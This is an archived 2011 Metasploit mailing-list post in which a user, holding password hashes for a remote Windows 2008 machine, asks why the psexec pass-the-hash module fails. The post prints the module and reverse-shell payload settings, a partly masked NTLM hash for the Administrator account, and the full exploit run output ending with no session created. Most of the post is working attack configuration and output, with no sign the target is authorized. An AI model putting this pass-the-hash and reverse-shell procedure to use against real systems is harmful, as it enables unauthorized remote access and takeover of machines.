Metasploit mailing list archives

psexec

From: audio audience <audience099 () gmail com>
Date: Wed, 19 Oct 2011 09:07:51 -0700

Hello All,
I have a remote system. This running win2k8 x86 system and i have all users
hash.
However, i ran psexec exploit but it's couldn't successfully.

- Disabled antivirus
- Checked regedit key :  "RequireSecuritySignature" to "0".
http://www.offensive-security.com/metasploit-unleashed/PSexec_Pass_The_Hash

Do you have any idea this jobs ?..

msf  exploit(psexec) > show options

Module options (exploit/windows/smb/psexec):

   Name       Current Setting
     Required  Description
   ----       ---------------
     --------  -----------
   RHOST      [IP Address]
    yes       The
target address
   RPORT      445
     yes       Set
the SMB service port
   SHARE      ADMIN$
    yes       The
share to connect to, can be an admin share (ADMIN$,C$,...) or a normal
read/write folder share
   SMBDomain  WORKGROUP
     no        The
Windows domain to use for authentication
   SMBPass    aad3bxxxxxxxxxx33435b61404ee:a7649e53c5d07306b78bfc7b2029a798
 no        The
password for the specified username
   SMBUser    Administrator
     no        The
username to authenticate as


Payload options (windows/shell_reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique: seh, thread,
process, none
   LHOST     0.0.0.0          yes       The listen address
   LPORT     4443             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf  exploit(psexec) > exploit

[*] Started reverse handler on 0.0.0.0:4443
[*] Connecting to the server...
[*] Authenticating to [IP Address]:445|WORKGROUP as user
'Administrator'...
[*] Uploading payload...
[*] Created \uqSjtJEP.exe...
[*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:[IP Address][\svcctl]
...
[*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:[IP Address][\svcctl]
...
[*] Obtaining a service manager handle...
[*] Creating a new service (nGbXrAdw - "MUQefrtYtKijwX")...
[*] Closing service handle...
[*] Opening service...
[*] Starting the service...
[*] Removing the service...
[*] Closing service handle...
[*] Deleting \uqSjtJEP.exe...
[*] Exploit completed, but no session was created.
msf  exploit(psexec) >

_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework

Current thread:

psexec audio audience (Oct 19)
- Re: psexec todb (Oct 19)
- Re: psexec Enis Sahin (Oct 19)